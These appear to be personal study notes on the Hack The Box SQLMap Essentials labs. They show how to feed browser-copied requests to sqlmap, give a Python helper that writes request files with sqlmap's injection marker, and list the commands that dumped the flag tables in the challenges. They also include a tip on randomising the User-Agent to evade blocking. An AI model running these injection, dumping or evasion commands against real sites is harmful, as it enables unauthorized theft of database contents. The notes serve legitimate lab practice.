SQLMap
Running SQLMap on an HTTP Request
An easy way to get the request data to hand over to sqlmap is to use "Copy as cURL" on the request in the browser's developer tools (Network tab). We can then change the leading curl to sqlmap, like so:
sqlmap 'http://www.example.com/?id=1' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0' -H 'Accept: image/webp,*/*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Connection: keep-alive' -H 'DNT: 1'
You can also use the -r flag to give sqlmap a whole request file (request line, headers and body) that you grabbed from a proxy:
sqlmap -r req.txt
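Both approaches above feed sqlmap the same thing, a complete HTTP request. The following is an added example for these notes (not code from sqlmap or from the HTB module) that turns a copied cURL command line into the raw request file that sqlmap -r reads. The sample curl command, host name and cookie values are constructed; the optional '*' it can append to a parameter value is sqlmap's own injection-point marker, which makes sqlmap test exactly that spot.

```python
"""Convert a browser "Copy as cURL" command into a raw request file for sqlmap -r.
Added example for these notes; not part of sqlmap or of the HTB module."""
import shlex
from urllib.parse import urlsplit

# Constructed sample: roughly what Firefox's "Copy as cURL" emits for a form
# POST. The host, session id and parameter are made up, not a real target.
SAMPLE_CURL = (
    "curl 'http://www.example.com/case2.php' -X POST "
    "-H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0' "
    "-H 'Accept: */*' "
    "-H 'Content-Type: application/x-www-form-urlencoded' "
    "-H 'Cookie: PHPSESSID=abc123; id=1' "
    "--compressed --data-raw 'id=1'"
)

# curl options that take no value and only affect transport, not the request itself.
VALUELESS = {"--compressed", "-s", "--silent", "-k", "--insecure", "-L", "--location"}
DATA_OPTS = {"-d", "--data", "--data-raw", "--data-binary", "--data-urlencode"}


def parse_curl(cmd):
    """Return (url, method, headers, body) from a curl command line.
    Only the options browsers actually emit are handled; anything else raises,
    so a silently dropped header never produces a misleading request file."""
    argv = shlex.split(cmd)
    if not argv or argv[0] != "curl":
        raise ValueError("not a curl command line")
    url = method = body = None
    headers = []
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg in ("-H", "--header"):
            name, _, value = argv[i + 1].partition(":")  # split at the first colon only
            headers.append((name.strip(), value.strip()))
            i += 2
        elif arg in ("-X", "--request"):
            method = argv[i + 1].upper()
            i += 2
        elif arg in ("-b", "--cookie"):
            headers.append(("Cookie", argv[i + 1]))
            i += 2
        elif arg in DATA_OPTS:
            body = argv[i + 1] if body is None else body + "&" + argv[i + 1]
            i += 2
        elif arg in VALUELESS:
            i += 1
        elif arg.startswith("-"):
            raise ValueError(f"unsupported curl option: {arg}")
        else:
            url = arg
            i += 1
    if url is None:
        raise ValueError("no URL in curl command")
    if method is None:  # curl switches to POST as soon as a body is given
        method = "POST" if body is not None else "GET"
    return url, method, headers, body


def mark_parameter(pairs, name, sep):
    """Append sqlmap's '*' injection marker to the value of `name` in a k=v list."""
    out = []
    for item in pairs.split(sep):
        key, eq, value = item.partition("=")
        if eq and key.strip() == name:
            item = f"{key}{eq}{value}*"
        out.append(item)
    return sep.join(out)


def to_request_file(cmd, mark=None):
    """Build the text of a request file for `sqlmap -r`.
    `mark` names a parameter (query string, Cookie header or body) that gets the
    '*' marker. Content-Length is left out on purpose: sqlmap sets it itself on
    the requests it sends, and a marker would make a copied value wrong anyway."""
    url, method, headers, body = parse_curl(cmd)
    parts = urlsplit(url)
    path, query = parts.path or "/", parts.query
    if mark:
        query = mark_parameter(query, mark, "&")
        body = mark_parameter(body, mark, "&") if body is not None else None
        headers = [(n, mark_parameter(v, mark, "; ") if n.lower() == "cookie" else v)
                   for n, v in headers]
    if query:
        path += "?" + query
    lines = [f"{method} {path} HTTP/1.1"]
    if not any(n.lower() == "host" for n, _ in headers):
        lines.append(f"Host: {parts.netloc}")
    lines.extend(f"{n}: {v}" for n, v in headers)
    text = "\r\n".join(lines) + "\r\n\r\n"  # the blank line ends the header block
    return text + body if body is not None else text


if __name__ == "__main__":
    with open("req.txt", "w", newline="") as fh:
        fh.write(to_request_file(SAMPLE_CURL, mark="id"))
    print("wrote req.txt; now run: sqlmap -r req.txt --batch")
```

Run it and then point sqlmap at the result with sqlmap -r req.txt. Without the mark argument you get a plain copy of the request and let sqlmap pick its own test targets; with mark="id" the '*' tells it to test that one value wherever it lives, which is handy when the injectable value sits in the Cookie header rather than in the URL.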
--random-agent is a valuable switch, as a lot of defenses block requests carrying sqlmap's default User-Agent (which openly identifies itself as sqlmap); with this switch sqlmap sends a randomly chosen browser User-Agent instead. We can also use --mobile to imitate a mobile device's User-Agent.
When it came to the challenges, I was at a bit of a loss on what to do, so I cheated a bit and found this URL: https://www.zwarts-sec.com/posts/Hack-The-Box-SQLMap-Essentials/
Essentially what we needed to do was grab the request (header information) and save it in a file. If the parameter being passed is custom, as in Case 2 and Case 4, then you do not need to tell sqlmap which value to test (fuzz? not sure if that is the correct term).
Both sqlmap commands are identical apart from the request file and the table name, as seen here:
sqlmap -r Case2.txt --threads 10 --dump -T flag2 --batch
and
sqlmap -r Case4.txt --threads 10 --dump -T flag4 --batch
What we are saying is: -r "use the saved .txt file as the full HTTP request", then --threads 10 "send up to 10 requests at a time to make it go faster". --dump -T flag(2/4) says to dump all the entries of the table named flag2 or flag4, and --batch simply says to run with the default answers so we don't have to keep approving or denying prompts.
Case 3 being:
sqlmap -r Case3.txt -p cookie --threads 10 --dump -T flag3 --batch
What this is saying is to test (fuzz) the parameter named with -p, which here is the value carried in the Cookie header. Worth knowing: on its own sqlmap only tests Cookie header values at --level 2 or higher (the default is 1), so the cookie has to be pointed out explicitly, either with -p or by putting sqlmap's '*' marker after the value in the request file.
Too much work to do more studying